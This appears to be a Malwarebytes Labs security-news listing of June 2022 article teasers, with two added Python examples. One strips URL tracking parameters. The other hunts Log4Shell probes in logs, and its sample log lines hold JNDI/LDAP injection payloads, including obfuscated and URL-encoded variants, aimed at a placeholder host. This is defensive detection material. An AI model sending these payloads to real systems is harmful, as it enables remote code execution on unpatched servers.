A week in security (June 27 – July 3)
Last week on Malwarebytes Labs: Ransomware review: June 2022 AstraLocker 2.0 ransomware isn’t going to give you your files back YTStealer targets YouTube content creators ZuoRAT is a sophisticated malware that mainly targets SOHO routers Amazon Photos vulnerability could have given attackers acce...
Ransomware review: June 2022
Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. This information represents victims who were successfully attacked but opted not to pay a ransom. In June, LockBit was the mos...
AstraLocker 2.0 ransomware isn’t going to give you your files back
ReversingLabs reports that the latest version of AstraLocker ransomware is engaged in a so-called "smash and grab" ransomware operation. Smash and grab is all about maxing out profit in the fastest time. It works on the malware authors' assumption that security software or victims will find...
YTStealer targets YouTube content creators
Researchers are reporting the discovery of malware targeting YouTube content creators. The aim is to compromise accounts and then take over the victims' channels completely. The malware, dubbed YTStealer, has one game plan: grabbing authentication cookies. A site gives you an authentication cookie...
ZuoRAT is a sophisticated malware that mainly targets SOHO routers
Researchers have analysed a campaign leveraging infected SOHO routers to target predominantly North American and European networks of interest. The so-called ZuoRAT campaign, which very likely started in 2020, is so sophisticated that the researchers suspect that there is a state sponsored threat...
Amazon Photos vulnerability could have given attackers access to user files and data
Amazon has patched a flaw in the Amazon Photos app which could have allowed an attacker to steal and use a user's unique access token that verifies their identity across multiple Amazon APIs. That would give attackers access to a trove of information, since many of these APIs contain personal data...
Criminals are applying for remote work using deepfake and stolen identities, says FBI
The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfakes and stolen personally identifiable information (PII). A deepfake is essentially created or modified media (image, video, or audio), often produced with the help of artificial intelligence (AI) and machine...
Immigration organisations targeted by APT group Evilnum
Organisations working in the immigration sector are advised to be on high alert for Advanced Persistent Threat (APT) attacks. Bleeping Computer reports that European organisations, specifically, are under threat from the Evilnum hacking group. Evilnum, on the APT scene since 2018 at the earliest an...
Update now! Mozilla fixes security vulnerabilities and introduces a new privacy feature for Firefox
Mozilla released version 102.0 of the Firefox browser to Release channel users on June 28, 2022. The new version fixes 20 security vulnerabilities, five of which are classified as “High”. The new version also comes with a new privacy feature that strips parameters from URLs that track you around...
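The following is an added example (not Mozilla's code, and not Firefox's shipped parameter list) of what query-parameter stripping does in practice: the URL is split, any query parameter whose name is on a tracking list is dropped, and the rest is reassembled with path and fragment untouched. The `TRACKING_PARAMS` set and `utm_` prefix below are an assumed, illustrative list; the case-insensitive match is a design choice of this example.

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

# Assumed, illustrative list of tracking parameters for this example. Firefox
# ships its own list; this one is not it and is not meant to be complete.
TRACKING_PARAMS = {"fbclid", "gclid", "dclid", "msclkid", "mc_eid", "mkt_tok", "_hsenc", "igshid"}
# Parameter-name prefixes treated as tracking (the utm_* family).
TRACKING_PREFIXES = ("utm_",)


def is_tracking_param(name: str) -> bool:
    """Case-insensitive match against the exact names and the prefixes above."""
    lowered = name.lower()
    return lowered in TRACKING_PARAMS or lowered.startswith(TRACKING_PREFIXES)


def strip_tracking_params(url: str) -> str:
    """Return url with known tracking query parameters removed.

    Non-tracking parameters keep their order, blank values are preserved, and
    the fragment is left untouched. If nothing survives, the '?' disappears too.
    """
    parts = urlsplit(url)
    kept = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if not is_tracking_param(k)]
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(kept), parts.fragment))


def stripped_params(url: str) -> list[str]:
    """Names of the parameters strip_tracking_params would remove (useful for auditing)."""
    return [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)
            if is_tracking_param(k)]


if __name__ == "__main__":
    # Constructed sample URL for the demo.
    sample = "https://example.com/article?id=42&utm_source=newsletter&utm_medium=email&fbclid=IwAR0abc#comments"
    print(strip_tracking_params(sample))
    print(stripped_params(sample))
```

Two caveats a practitioner should keep in mind: list-based stripping only removes names it knows, so a site that renames its identifier or folds it into the path is untouched; and because the kept parameters are decoded and re-encoded, percent-encoding of their values may be normalised (for example `%20` becomes `+`), which matters if you compare the result against the original string.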
Raccoon Stealer returns with a new bag of tricks
The popular malware Raccoon Stealer, which suspended operations after a developer allegedly died in the Ukraine invasion, has returned. Raccoon Stealer is malware-as-a-service, with the developers selling it to would-be users. The operation is a tightly-run ship, to the extent that customers have...
RansomHouse claims to have stolen at least 450GB of AMD’s data
AMD is investigating the claim that the RansomHouse extortion group has its hands on more than 450GB of the company's data. AMD's breach revelation came to light after RansomHouse teased on Telegram about selling data belonging to a popular three-letter company that starts with the letter A. The...
Forced Chrome extensions get removed, keep reappearing
In the continued saga of annoying search extensions we have a new end-of-level boss. Victims have been reporting browser extensions that were removed by Malwarebytes, but “magically” came back later. Since the victims also complained about the message saying their browser was "managed", we had a...
Internet Safety Month: Everything you need to know about Omegle
Omegle reached the heady heights of fame when everyone least expected it. Thanks to TikTok influencers, children flocked to this 13-year-old platform during the pandemic, unaware of the dangers already there. The concept of talking to strangers online is Omegle's main selling point, but it's not ne...
Hermit spyware is deployed with the help of a victim’s ISP
Google's Threat Analysis Group (TAG) has revealed a sophisticated spyware activity involving internet service providers (ISPs) aiding in downloading powerful commercial spyware onto users' mobile devices. The spyware, dubbed Hermit, is reported to have government clients much like Pegasus. Italian vend...
City worker loses USB stick containing data on every resident after day of drinking
A person working in the city of Amagasaki, in western Japan, has mislaid a USB stick which contained data on the city's 460,000 residents. The USB drive was in a bag that went missing during a reported day of drinking and dining at a restaurant last Tuesday. The person reported it to the police th...
LGBTQ+ community targeted by extortionists who threaten to publish nudes
The Federal Trade Commission (FTC) has warned the LGBTQ+ community about extortionists posing as potential romantic partners on Grindr and Feeld. The scammers send their targets explicit photos and then ask for them to reciprocate. If they do, targets are then blackmailed into paying a ransom,...
You only have nine months to ditch Exchange Server 2013
Microsoft has posted a reminder that Exchange Server 2013 reaches End of Support (EoS) on April 11, 2023. That's a little more than nine months from now. A useful and timely reminder, since we all realize that it takes some time to migrate to a different system. Every Windows product has a lifecycle. T...
Brave Search wants to replace Google’s biased search results with yours
Brave Search, Brave Software's privacy search engine, just turned one. To celebrate, the company says it is moving the search engine out of its beta phase to become the default search engine for all Brave browser users. Goodbye, Google? Not entirely. In May 2015, Mozilla alumni Brendan Eich and...
CISA Log4Shell warning: Patch VMware Horizon installations immediately
CISA and the United States Coast Guard Cyber Command (CGCYBER) are warning that the threat of Log4Shell hasn't gone away. It's being actively exploited and used to target organisations using VMware Horizon and Unified Access Gateway servers. Log4Shell: what is it? Log4Shell was a zero-day vulnerabili...
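Since Log4Shell exploitation attempts arrive as text in whatever the target logs (user agents, request paths, form fields), hunting for them in existing logs is a natural first step while patching. The block below is an added example, not CISA's, Malwarebytes' or VMware's tooling: it normalises the common obfuscations that attackers used to dodge naive `${jndi:` string matching (URL encoding, `${lower:j}`/`${upper:n}` case lookups, and `${::-j}`/`${env:NaN:-j}` default-value lookups) by collapsing innermost lookups until the line stops changing, then looks for the JNDI marker. The sample log lines are constructed for the demo; the normaliser covers the tricks seen in the wild, not every lookup Log4j supports, so treat it as triage, not as the fix.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: braces whose content holds no further "$", "{" or "}".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# ${lower:x} / ${upper:x} case-conversion lookups.
_CASE_LOOKUP = re.compile(r"(lower|upper):(.*)", re.IGNORECASE | re.DOTALL)
# What we are ultimately looking for, once the line is normalised.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
MAX_PASSES = 20  # safety bound; real inputs converge in two or three passes


def _resolve(match: re.Match) -> str:
    """Collapse one innermost lookup the way attackers relied on Log4j doing it;
    anything we do not recognise is left exactly as it was."""
    inner = match.group(1)
    if ":-" in inner:                      # ${env:NaN:-j} or ${::-j}  ->  "j"
        return inner.split(":-", 1)[1]
    case = _CASE_LOOKUP.fullmatch(inner)   # ${lower:J} / ${upper:n}  ->  "J" / "n"
    if case:
        return case.group(2)
    return match.group(0)                  # ${jndi:...}, ${date:...}, ${user.home} unchanged


def normalize(text: str) -> str:
    """Undo URL-encoding and nested lookups until the string stops changing."""
    for _ in range(MAX_PASSES):
        new = _INNER_LOOKUP.sub(_resolve, unquote(text))
        if new == text:
            return text
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, once normalised, contains a JNDI lookup marker."""
    return _JNDI.search(normalize(line)) is not None


def find_probes(lines) -> list[int]:
    """Indices of the lines that look like Log4Shell exploitation attempts."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


# Constructed access-log lines (Apache combined format) for the demo; the IPs are
# from documentation ranges and the traffic never happened.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2022:10:12:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jul/2022:10:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [01/Jul/2022:10:12:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NaN:-i}:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [01/Jul/2022:10:12:11 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.12 - - [01/Jul/2022:10:13:00 +0000] "GET /docs/${user.home} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i in find_probes(SAMPLE_LOG):
        print(f"line {i}: {normalize(SAMPLE_LOG[i])}")
```

The last sample line is there as a false-positive check: a bare `${user.home}` lookup in a path is suspicious but is not a JNDI probe, and the normaliser leaves it alone. Running this over a Horizon or UAG server's request logs tells you whether you were probed; whether a probe succeeded still has to come from the Java side (outbound LDAP/RMI connections, unexpected class loading, or the post-exploitation activity CISA describes).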
Instagram introduces new ways for users to verify their age
If Instagram suspects you are fibbing about your age, you'll currently see the following message: “You must be at least 13 years old to have an Instagram account. We disabled your account because you are not old enough yet. If you believe we made a mistake, please verify your age by submitting a...
A week in security (June 20 – June 26)
Last week on Malwarebytes Labs: LinkedIn scams are a "significant threat", warns FBI DDoS-for-hire service provider jailed Internet Safety Month: 7 tips for staying safe online while on vacation Client-side Magecart attacks still around, but more covert Security vulnerabilities: 5 times that...
5 ways to avoid being catfished
Today, many Americans will head out to the water—not to swim, but to catch a catfish in time for National Catfish Day. But when we talk about catfishing in cybersecurity, we mean something different. Here, catfishing refers to someone who assumes someone else's identity online in order to harass,...
Cybersecurity agencies: You don’t have to delete PowerShell to secure it
Microsoft's PowerShell is a useful, flexible tool that is as popular with criminals as it is with admins. Cybercrooks like it because PowerShell is powerful, available almost everywhere, and doesn't look out of place running on a company network. In most places it isn't practical to block PowerShell...
Conti ransomware group’s pulse stops, but did it fake its own death?
The dark web leak site used by the notorious Conti ransomware gang has disappeared, along with the chat function it used to negotiate ransoms with victims. For as long as this infrastructure is down the group is unable to operate and a significant threat is removed from the pantheon of ransomware...
Dial 311 for… cybersecurity emergencies?
Members of the Cybersecurity Advisory Committee of the Cybersecurity and Infrastructure Security Agency (CISA) have proposed an emergency cybersecurity call line for small and medium-sized businesses (SMBs). Should the proposition be approved, SMBs would be able to call 311 in the event of a cybersecurit...
Rogue cryptocurrency billboards go phishing for wallets
Billboards and digital real-world advertising have raised many questions of privacy and anonymity in recent years. Until now, the primary concern has been legal, yet potentially objectionable, geolocation and user profiling. Bluetooth beacons work in tandem with geofenced billboards to send...
Police seize and dismantle massive phishing operation
Europol has coordinated a joint operation to arrest members of a cybercrime gang and effectively dismantle their campaigns, which netted millions of euros. This operation also led the Belgian Police (Police Fédérale/Federale Politie) and the Dutch Police (Politie) to nine arrests, 24 house searches, and...
MEGA claims it can’t decrypt your files. But someone’s managed to…
MEGA, the cloud storage provider and file hosting service, is very proud of its end-to-end encryption. It says it couldn't decrypt your stored files, even if it wanted to. “All your data on MEGA is encrypted with a key derived from your password; in other words, your password is your main encrypti...
7-Zip gets Mark of the Web feature, increases protection for users
One of the most popular zip programs around, 7-Zip, now offers support for Mark of the Web (MOTW), which gives users better protection from malicious files. This is good news. But what does that actually mean? In the bad old days, opening up a downloaded document could be a fraught exercise...
Watch out for the email that says “You have a new voicemail!”
A phishing campaign is using voicemail notification messages to go after victims' Office 365 credentials. According to researchers at Zscaler, the campaign uses spoofed emails with an HTML attachment that contains encoded JavaScript. The email claims that you have a new voicemail and that you can...
DFSCoerce, a new NTLM relay attack, can take control over a Windows domain
A researcher has published a proof-of-concept (PoC) for an NTLM relay attack dubbed DFSCoerce. The method leverages the Distributed File System: Namespace Management Protocol (MS-DFSNM) to seize control of a Windows domain. Active Directory: A directory service is a hierarchical arrangement of objects...
Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine
This blog post was authored by Hossein Jazi and Roberto Santos. In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers. APT28, also known as Sofacy and Fan...
You can be tracked online using your Chrome browser extensions
A researcher has found a way to generate a fingerprint of your device from your installed Google Chrome extensions, and then use that fingerprint to track you online. Fingerprinting is a way of figuring out what makes your device unique and then using that to identify you as you move around the...
Security vulnerabilities: 5 times that organizations got hacked
Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations — and it’s no secret that hackers are always looking for security vulnerabilities in them to exploit. According to research by BetterCloud, the average company...
Client-side Magecart attacks still around, but more covert
This blog post was authored by Jérôme Segura. We have seen and heard less buzz about Magecart during the past several months. While some marketing playbooks continue to rehash the same breaches of yesteryear, we have been wondering if some changes took place in the threat landscape. One thing we...
Internet Safety Month: 7 tips for staying safe online while on vacation
Going on vacation has never been more talked about and anticipated. I mean—for many of us, it's been a while. But before you get lost in dreamy thoughts of sun, sea, and sand, you might want to set aside some time to plan how to keep your devices, and your data, safe while you are relaxing. Your...
DDoS-for-hire service provider jailed
Matthew Gatrel, a 33-year-old man from St. Charles, Illinois, has been sentenced to two years in prison for running websites that provided powerful distributed denial-of-service (DDoS) attacks against internet users and websites. The case also resulted in the seizure of his websites, making the...
LinkedIn scams are a “significant threat”, warns FBI
Digital currency fraud is a growing issue on social media, and LinkedIn is no different. In fact, according to Sean Ragan, the FBI’s special agent in charge of the San Francisco and Sacramento, California, field offices, cryptocurrency scams are big business on LinkedIn. "It’s a...
A week in security (June 13 – June 19)
Last week on Malwarebytes Labs: Serious vulnerabilities found in ITarian software, patches available for SaaS products Update Chrome now: Four high risk vulnerabilities found Taking down the IP2Scam tech support campaign Don’t panic! “Unpatchable” Mac vulnerability discovered Introducing...
Securing the software supply chain, with Kim Lewandowski: Lock and Code S03E13
At the start of the global coronavirus pandemic, nearly everyone was forced to learn about the "supply chain." Immediate stockpiling by an alarmed (and, to a smaller degree, opportunistic) public led to an almost overnight disappearance of hand sanitizer, bottled water, toilet paper, and face masks...
ALPHV squeezes victim with dedicated leak site for employees and customers
Eyebrows were raised this week when the ALPHV ransomware group created a leak site dedicated to just one of its victims. The site was aimed at the employees and guests of a hotelier that had been attacked, and allowed them to see if their personal details had been leaked. The new tactic seems to ...
Hertzbleed exposes computers’ secret whispers
Hertzbleed is the name for a vulnerability that can be used to obtain cryptographic keys and other secret data from Intel and AMD CPUs, remotely. It works by inferring changes in power consumption from the careful timing of known workloads, which is possible thanks to a processor power saving...
Interpol’s First Light operation smashes crime on a global scale
A large-scale Interpol operation has resulted in arrests and seizures of ill-gotten gains galore. Operation First Light took place between March and May of this year. It involved 76 countries taking social engineers and telecommunications fraudsters to task, with multiple wins for those involved...
Photos of kids taken from spyware-ridden phones found exposed on the internet
A stalkerware-type app that boasts "the best free phone spying software on the market" has exposed the data it snooped from the phones on which it was installed. The data exposed by TheTruthSpy included GPS locations and photos on victims' phones, and images of children and babies. This news, first...
Stealthy Symbiote Linux malware is after financial institutions
Symbiote, a new "nearly impossible to detect" Linux malware, targeted financial sectors in Latin America—and the threat actors behind it might have links to Brazil. These findings were revealed in a recent report, a joint effort between the BlackBerry Research Team and Dr. Joakim Kennedy, a...
Record breaking HTTPS DDoS attack
Last week, Cloudflare blocked the largest HTTPS DDoS attack on record. The attack amassed some 26 million requests per second (rps). The previous record for an HTTPS DDoS attack was 15.3 million rps. The attack targeted an unnamed Cloudflare customer and originated mostly from Cloud Service Provider...
Firefox stops advertisers tracking you as you browse, calls itself the most “private and secure major browser”
Cookies are in the news as Mozilla rolls out significant privacy changes for Firefox. The idea is to dramatically lessen the risk of privacy-invading tracking across websites without your knowledge. Tracking cookies have been a hot topic in recent months, as advertisers try switching to other...
Update now! Microsoft patches Follina, and many other security updates
The June 2022 Patch Tuesday may go down in history as the day that Follina got patched, but there was a host of other important updates. And not just from Microsoft. Many other software vendors follow the pattern of monthly updates set by the people in Redmond. Microsoft: Microsoft released update...
It’s official, today you can say goodbye to Internet Explorer. Or can you?
Today, the Internet Explorer (IE) 11 desktop application goes out of support and will be retired for certain versions of Windows 10. The retirement consists of two phases. During the first phase—the redirection phase—devices will be progressively redirected from IE to Microsoft Edge over the...
Email compromise leads to healthcare data breach at Kaiser Permanente
At least 69,000 people have been impacted by a data breach at Kaiser Permanente, a long-running managed healthcare consortium. The latest in a long-running series of healthcare attacks, the road to stolen data began on April 5 this year with an email compromise. The direct path to data: A...